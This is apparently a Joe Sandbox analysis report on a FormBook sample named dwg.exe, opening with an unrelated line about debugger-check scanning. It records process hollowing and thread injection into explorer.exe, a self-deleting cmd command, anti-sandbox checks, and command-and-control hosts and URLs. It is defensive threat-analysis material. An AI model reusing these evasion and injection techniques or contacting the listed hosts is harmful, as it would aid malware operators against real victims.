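The scan is byte-pattern based, so it will also match the sequences inside data or unaligned code; treat a hit as a pointer to disassemble, not as a verdict. The follow-up window is deliberately short because compilers emit the BeingDebugged read right after the PEB load, whereas an Ldr walk loads a different offset.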

      HIPS / PFW / Operating System Protection Evasion:

      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80
      Source: C:\Windows\explorer.exe Network Connect: 94.136.40.51 80
      Source: C:\Windows\explorer.exe Network Connect: 192.0.78.25 80
      Source: C:\Windows\explorer.exe Network Connect: 146.148.189.216 80
      Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
      Source: C:\Windows\explorer.exe Network Connect: 104.21.56.93 80
      Source: C:\Windows\explorer.exe Network Connect: 47.110.53.154 80
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\dwg.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\dwg.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\dwg.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\dwg.exe Thread register set: target process: 3472
      Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 3472
      Queues an APC in another process (thread injection)
      Source: C:\Users\user\Desktop\dwg.exe Thread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing technique
      Source: C:\Users\user\Desktop\dwg.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: A90000
      Source: C:\Users\user\Desktop\dwg.exe Process created: C:\Users\user\Desktop\dwg.exe 'C:\Users\user\Desktop\dwg.exe'
      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\dwg.exe'
      Source: explorer.exe, 00000004.00000000.284110577.0000000005EA0000.00000004.00000001.sdmp, rundll32.exe, 0000000D.00000002.491840148.0000000002CB0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000004.00000000.273711682.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.491840148.0000000002CB0000.00000002.00000001.sdmp Binary or memory string: Progman
      Source: explorer.exe, 00000004.00000000.273711682.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.491840148.0000000002CB0000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
      Source: explorer.exe, 00000004.00000000.273519346.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
      Source: explorer.exe, 00000004.00000000.273711682.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.491840148.0000000002CB0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
      Source: explorer.exe, 00000004.00000000.273711682.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.491840148.0000000002CB0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\dwg.exe Code function: 1_2_00564B00 cpuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match; File source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY
Yara detected Generic Dropper
Source: Yara match; File source: Process Memory Space: rundll32.exe PID: 6456, type: MEMORY
Source: Yara match; File source: Process Memory Space: dwg.exe PID: 1544, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match; File source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules1 | Path Interception | Process Injection512 | Virtualization/Sandbox Evasion22 | OS Credential Dumping | Security Software Discovery721 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection512 | LSASS Memory | Virtualization/Sandbox Evasion22 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information3 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Rundll321 | LSA Secrets | System Information Discovery311 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

      Behavior Graph

Behavior Graph ID: 358411; Sample: dwg.exe; Start date: 25/02/2021; Architecture: WINDOWS; Score: 100

Top-level signatures: www.qionglaizhan.com (DNS); Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 5 other signatures

Process tree (graph rendered as text):
dwg.exe (started): Contains functionality to detect hardware virtualization (CPUID execution measurement); Detected RDTSC dummy instruction sequence (likely for instruction hammering); Tries to detect Any.run; 3 other signatures
  dwg.exe (started): 45.153.203.33, 49716, 80 NETLABFR Netherlands; Modifies the context of a thread in another process (thread injection); Tries to detect Any.run; Maps a DLL or memory area into another process; 3 other signatures
    explorer.exe (injected): www.guillemaudexcellenceauto.com 146.148.189.216, 49733, 80 HENGTONG-IDC-LLCUS United States; delmarranch.com 34.102.136.180, 49727, 80 GOOGLEUS United States; 11 other IPs or domains; System process connects to network (likely due to code injection or exploit)
      rundll32.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        cmd.exe (started)
          conhost.exe (started)

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

Source | Detection | Scanner | Label
dwg.exe | 28% | ReversingLabs | Win32.Backdoor.Androm

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

Source | Detection | Scanner | Label
13.2.rundll32.exe.4927960.5.unpack | 100% | Avira | TR/Dropper.Gen
13.2.rundll32.exe.6843e8.1.unpack | 100% | Avira | TR/Dropper.Gen

      Domains

Source | Detection | Scanner
www.apkiinsurance.com | 0% | Virustotal
www.guillemaudexcellenceauto.com | 0% | Virustotal

      URLs


      Domains and IPs

      Contacted Domains


                            Contacted URLs


                            URLs from Memory and Binaries


                                                Contacted IPs


                                                Public


                                                General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 358411
Start date: 25.02.2021
Start time: 15:33:06
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 17s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: dwg.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/0@13/8
EGA Information: Failed
HDC Information:
• Successful, ratio: 49.4% (good quality ratio 43.1%)
• Quality average: 71.6%
• Quality standard deviation: 33.2%
HCA Information:
• Successful, ratio: 62%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                • TCP Packets have been reduced to 100
                                                • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 93.184.220.29, 51.104.139.180, 52.147.198.201, 104.42.151.234, 23.211.6.115, 13.64.90.137, 184.30.20.56, 51.104.144.132, 2.20.142.210, 2.20.142.209, 51.103.5.159, 92.122.213.247, 92.122.213.194, 142.250.180.147, 52.155.217.156, 20.54.26.129
                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, ghs.google.com, cs9.wac.phicdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, vip1-par02p.wns.notify.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, dual-a-0001.dc-msedge.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                No simulations

                                                Joe Sandbox View / Context

                                                IPs

                                                Match: 192.0.78.25
                                                Associated Sample Name / URL | Detection | Context
                                                dwg.exe | malicious | www.bloomingintoyou.com/gzjz/?Rxo=8pyT5Z4hoPNLSb&an=8yKicZTiYwz0hefatpOkgI7InzeyxHrMIp7ZjAxRWYlijCvBEtCIbqNPIKBmez+UsXeV
                                                IKtgCGdzlg.exe | malicious | www.wmarquezy.com/bw82/?9rjHF6y=/EPqbtSCMBudkSBZRYE1urAc3bDaNMBRSmi9VqH/YEA51Bpt3rASv6f17YeEGiH+FcCyQowbqQ==&lX9d=p48hVnrp1tqPRT7P
                                                22 FEB -PROCESSING.xlsx | malicious | www.glasshouseroadtrip.com/bw82/?RFQx_=9eHfuSy5bsinEXEf9UcXOob2js7MmdckS7hVoe2yzKUXnEaN1LaM8/a2W/lIeY/LicAkBw==&GZopM=kvuD_XrpiP
                                                IMG_7742_Scanned.doc | malicious | www.vagrantmind.com/gypo/?UrjPuprX=a22oXTEFK1VaKxP6jotNX9moxeWCA++9mvVJflp0ux1+Oqp3qAY+htsSgKT64ou7evePhg==&nnLx=UBZp3XKPefjxdB
                                                D6ui5xr64I.exe | malicious | www.alexcristal.com/kre/?FDHHVLz=4NcFJbIx9XK1PYhWI73h4XpnBrQXD9dbg5JqYS600ODvXTXJVvkZ0WJzlPxZTSDnQnyx&Rb=VtX4-
                                                9j4sD6PmsW.exe | malicious | www.alexcristal.com/kre/?aR-8_FK0=4NcFJbIx9XK1PYhWI73h4XpnBrQXD9dbg5JqYS600ODvXTXJVvkZ0WJzlMRjDDjfKAT2&UlPt=DVohLl3xOrmlMF
                                                po.exe | malicious | www.spanishjaponia.com/wtb/?tdcxfR=/SLohMkaSme8KQmscEO5zyeff+NH4C7nb7Kbu7K9qBGaaLOXNqJ/IyUS4tswlt55UVBx&DxoHn=2daDG
                                                SKMBT_C280190724010211.exe | malicious | www.brightandfreshfaces.com/css/?X2MhMfE0=ZN3ViUDOzxg5uhKqZwbFMgY8qo8vAnJC8OVwb1xkx9iwE6Y5op56c5mUT7DJAYlQEeIN&8p=EZTP7L
                                                FEB_2021.EXE | malicious | www.leadeligey.com/bw82/?rp=vUh86D2kaUcvG8cSXUIE+TYOTfOFz6ihzRiGvCHG7B+/lKZzNCz3xlSTvMpIR1S+NdhZ&RR=YrHlp8D
                                                VESSEL SPECIFICATION 2021.exe | malicious | www.v-surf-boards.com/thg/?hdmTvBAH=vedIkwMGAXbyu6oNrwAvvXp483A8bH0EhwZ5FQQQ4sr9cn5ccMruY6e7Q8V7TpjHwSYA&BR-tMX=XPJtkJ38
                                                Docs.exe | malicious | www.w-ciszy-serca.com/mph/?BXnXAP=YrhH0RRxT8EL1Dl0&2d8=HhP/jN+N/sXTaZ8/3fGnc0oK8/ih6OJXlCeyiM3x1xpWLsZL7bbd6eZCGkHpoe1MVPjf
                                                8nxKYwJna8.exe | malicious | www.treningi-enduro.com/csv8/?OjKL3=zMci1XF7kcEgJbB0bxSLkx3uOQBO7DjFCctU3OhNTvbnisOmfQ6emD2pBeYu1j12S2p0&UT=EhUhb4
                                                Xi4vVgHekF.exe | malicious | www.newfacesatv.info/rina/?GFQL=ppFJhxZ/poTzDSMGT1HJyUg3NUxhm/dyZyRA539kIehONzPOa9y11HW9paxI3u+DZB07&wFN0DX=UtX8E
                                                hkcmd.exe | malicious | www.glasshouseroadtrip.com/bw82/?FVWl=9eHfuSy8brijEHIT/UcXOob2js7MmdckS75F0dqz3qUWn12LybLAq7i0VaJ0F4L4tdVU&AlO=O2MtmfRxc
                                                2Debit Note_OwnersInvoices.exe | malicious | www.kazancsere.net/ivay/?NrQLEP=D48x&1bz=aaBEw9Yir1+hkeWoWLH1LjL9H2PhIHEM/4MpJ31it9FOz57KTCmY8+Kffl97ACZ0KQ0a
                                                YWrrcqVAno.exe | malicious | www.glasshouseroadtrip.com/bw82/?u8iLW=9eHfuSy8brijEHIT/UcXOob2js7MmdckS75F0dqz3qUWn12LybLAq7i0VaJ0F4L4tdVU&OhNhA=9rUlSVPXQJJ
                                                j64eIR1IEK.exe | malicious | www.treningi-enduro.com/csv8/?Bz=zMci1XF7kcEgJbB0bxSLkx3uOQBO7DjFCctU3OhNTvbnisOmfQ6emD2pBeYu1j12S2p0&R0G=dhrxP2v88TRtsx
                                                Order confirmation 64236000000025 26.01.2021.exe | malicious | www.brendonellis.com/bnuw/?Mv0h=QSs7jQDeFsICiQBBJT3dneCSujMK1kRtf3DX2CBTXjaAl0pqu+ZlchGrg3MzDtdcBC8Q&VPXh=GhIH
                                                D6mimHOcsr.exe | malicious | www.wmarquezy.com/bw82/?7n=/EPqbtSCMBudkSBZRYE1urAc3bDaNMBRSmi9VqH/YEA51Bpt3rASv6f17YS9KDr+Saej&RZ=Y4C4ZlKPDRhPDXy
                                                r.exe | malicious | www.andrewsreadingjournal.com/uds2/?_jPlXT=HdLSVyUFGLZERDc21vAze+eEMrorFA8CuNZ+YPXMfnOMoW52wWx899FazcdJxWS7BsXFqvIALA==&n4=iN68RdPpj

                                                Domains

                                                Match: shops.myshopify.com
                                                Associated Sample Name / URL | Detection | Context
                                                RQP_10378065.exe | malicious | 23.227.38.74
                                                9VZe9OnL4V.exe | malicious | 23.227.38.74
                                                transferir copia_98087.exe | malicious | 23.227.38.74
                                                0O9BJfVJi6fEMoS.exe | malicious | 23.227.38.74
                                                4pFzkB6ePK.exe | malicious | 23.227.38.74
                                                ORDER SPECIFICATIONS.exe | malicious | 23.227.38.74
                                                ORDER LIST.xlsx | malicious | 23.227.38.74
                                                PO_210222.exe | malicious | 23.227.38.74
                                                SecuriteInfo.com.Trojan.Inject4.6572.10651.exe | malicious | 23.227.38.74
                                                SecuriteInfo.com.Trojan.Inject4.6572.17143.exe | malicious | 23.227.38.74
                                                IMG_7742_Scanned.doc | malicious | 23.227.38.74
                                                PDF.exe | malicious | 23.227.38.74
                                                D6ui5xr64I.exe | malicious | 23.227.38.74
                                                Drawings.xlsm | malicious | 23.227.38.74
                                                Purchase order.exe | malicious | 23.227.38.74
                                                AgroAG008021921doc_pdf.exe | malicious | 23.227.38.74
                                                IMG_7189012.exe | malicious | 23.227.38.74
                                                DHL Shipment Notification 7465649870,pdf.exe | malicious | 23.227.38.74
                                                HEC Batangas Integrated LNG and Power Project DocumentationsType a message.exe.exe | malicious | 23.227.38.74
                                                DHL Shipment Notification 7465649870.pdf.exe | malicious | 23.227.38.74

                                                ASN

                                                Match: AUTOMATTICUS
                                                Associated Sample Name / URL | Detection | Context
                                                55gfganfgF.exe | malicious | 192.0.78.24
                                                RFQ TRQ04022020_pdf.exe | malicious | 192.0.78.133
                                                dwg.exe | malicious | 192.0.78.25
                                                IKtgCGdzlg.exe | malicious | 192.0.78.25
                                                22 FEB -PROCESSING.xlsx | malicious | 192.0.78.25
                                                unmapped_executable_of_polyglot_duke.dll | malicious | 192.0.84.247
                                                AWB-INVOICE_PDF.exe | malicious | 192.0.78.24
                                                IMG_7742_Scanned.doc | malicious | 192.0.78.25
                                                D6ui5xr64I.exe | malicious | 192.0.78.25
                                                AgroAG008021921doc_pdf.exe | malicious | 192.0.78.24
                                                P.O-48452689535945.exe | malicious | 192.0.78.24
                                                CMahQwuvAE.exe | malicious | 192.0.78.24
                                                c4p1vG05Z8.exe | malicious | 192.0.78.24
                                                zMJhFzFNAz.exe | malicious | 192.0.78.24
                                                kgozmovHpY.exe | malicious | 192.0.78.24
                                                9j4sD6PmsW.exe | malicious | 192.0.78.25
                                                ransomware.exe | malicious | 192.0.78.12
                                                po.exe | malicious | 192.0.78.25
                                                SKMBT_C280190724010211.exe | malicious | 192.0.78.25
                                                ZRz0Aq1Rf0.dll | malicious | 192.0.78.12

                                                Match: HENGTONG-IDC-LLCUS
                                                Associated Sample Name / URL | Detection | Context
                                                PO_210222.exe | malicious | 104.232.96.251
                                                IMG_7742_Scanned.doc | malicious | 202.14.6.113
                                                zMJhFzFNAz.exe | malicious | 203.88.111.71
                                                Payment_Advice.exe | malicious | 107.178.135.177
                                                Order 8953-PDF.exe | malicious | 103.202.50.110
                                                IN 20201125 PL.xlsx | malicious | 45.41.85.153
                                                Order Catalogue.xlsx | malicious | 146.148.242.120
                                                documents_0084568546754.exe | malicious | 104.232.66.117
                                                EK6BR1KS50.exe | malicious | 146.148.193.212
                                                SWIFT Payment DOOEL EUR 74,246.41 20210101950848.exe | malicious | 107.178.135.177
                                                Arrival Notice.exe | malicious | 146.148.192.218
                                                PO101420.exe | malicious | 203.76.236.102
                                                J0OmHIagw8.exe | malicious | 146.148.193.212
                                                urgent specification request.exe | malicious | 45.42.89.146
                                                Doc_74657456348374.xlsx.exe | malicious | 104.232.66.117
                                                XWW8KE7078.exe | malicious | 45.41.85.153
                                                yKFlKg9R6m.exe | malicious | 45.41.85.153
                                                current productlist.exe | malicious | 107.178.155.203
                                                Details!!!!.exe | malicious | 146.148.190.200
                                                googlechrome_3843.exe | malicious | 146.148.193.212

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                No created / dropped files found

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):5.724499720734536
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.15%
                                                • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:dwg.exe
                                                File size:98304
                                                MD5:6a9035b7435c6aa9e6c8e31cf771e316
                                                SHA1:16a6d2ac44b8ac3cbe112916d8cd9912d3f0dbf7
                                                SHA256:6f33f5e3a23420dacdc26fb8e2eef07fe482e634d4b832b0917cbe7ed37864f5
                                                SHA512:bc77de47966c4efff0220fbac4ce74051d76b283eac0d2c7ebeeadb680cccbc96bc303ed6df3606c87071a87854c1fcbf2b2dd5eeb5909ce83600dce8643fc04
                                                SSDEEP:1536:AbLxrs30pwHPhtvxYovnvasYyFbJotMK8nlKmbL:ILPM5QyF1vHL
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L...e.]N.................0...P......H........@....@

                                                File Icon

                                                Icon Hash:10b0b2095489f81e

                                                Static PE Info

                                                General

                                                Entrypoint:0x401348
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                DLL Characteristics:
                                                Time Stamp:0x4E5D1F65 [Tue Aug 30 17:35:33 2011 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:c6ebaa5f331077d9c6c3ae892d7a39ce

                                                Entrypoint Preview

                                                Instruction
                                                push 00404250h
                                                call 00007F84D4A2D675h
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                xor byte ptr [eax], al
                                                add byte ptr [eax], al
                                                inc eax
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [ecx-62h], bh
                                                sbb dh, byte ptr [edi+4685EFCEh]
                                                stosd
                                                push esp
                                                mov eax, E57BCCEEh
                                                fadd dword ptr [eax]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [ecx], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [ecx+4Eh], al
                                                push esp
                                                inc ebp
                                                push edx
                                                dec ecx
                                                inc ecx
                                                inc esp
                                                inc edi
                                                push edx
                                                dec ecx
                                                pop edx
                                                pop edx
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add bh, bh
                                                int3
                                                xor dword ptr [eax], eax
                                                and byte ptr [ebp+16h], ah
                                                rol dh, cl
                                                and eax, B44EA7F0h
                                                jecxz 00007F84D4A2D696h
                                                movsb
                                                cmp bh, ch
                                                retn 8EA3h
                                                mov bl, C0h
                                                jc 00007F84D4A2D664h
                                                daa
                                                inc edi
                                                test al, B7h
                                                jne 00007F84D4A2D6F7h
                                                push 3A215E00h
                                                dec edi
                                                lodsd
                                                xor ebx, dword ptr [ecx-48EE309Ah]
                                                or al, 00h
                                                stosb
                                                add byte ptr [eax-2Dh], ah
                                                xchg eax, ebx
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                in eax, 2Dh
                                                add byte ptr [eax], al
                                                out dx, eax
                                                daa
                                                add byte ptr [eax], al
                                                add byte ptr [eax], cl
                                                add byte ptr [edx+45h], al
                                                push esi
                                                inc edi
                                                inc ebp
                                                dec esp
                                                push ebx
                                                inc ebp
                                                add byte ptr [42000C01h], cl
                                                jnc 00007F84D4A2D6F7h
                                                imul ebp, dword ptr [esp+ebp*2+00h], 00000000h

                                                Data Directories

                                                Name | Virtual Address | Virtual Size | Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x136f4 | 0x3c | .text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x2c72 | .rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x238 | 0x30 |
                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0xd8 | .text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                Sections

                                                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                .text | 0x1000 | 0x12b04 | 0x13000 | False | 0.439453125 | data | 6.24870257971 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .data | 0x14000 | 0x19cc | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                .rsrc | 0x16000 | 0x2c72 | 0x3000 | False | 0.409342447917 | data | 4.49735724086 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                Name | RVA | Size | Type | Language | Country
                                                RT_ICON | 0x17dca | 0xea8 | data | |
                                                RT_ICON | 0x17522 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 2763565, next used block 3552051 | |
                                                RT_ICON | 0x16fba | 0x568 | GLS_BINARY_LSB_FIRST | |
                                                RT_ICON | 0x16cd2 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 3207626755, next used block 12467 | |
                                                RT_ICON | 0x16baa | 0x128 | GLS_BINARY_LSB_FIRST | |
                                                RT_ICON | 0x16542 | 0x668 | data | |
                                                RT_GROUP_ICON | 0x164e8 | 0x5a | data | |
                                                RT_VERSION | 0x161e0 | 0x308 | data | Chinese | China

                                                Imports

                                                DLL | Import
                                                USER32.DLL | HideCaret
                                                MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                                Version Infos

                                                Description | Data
                                                Translation | 0x0804 0x04b0
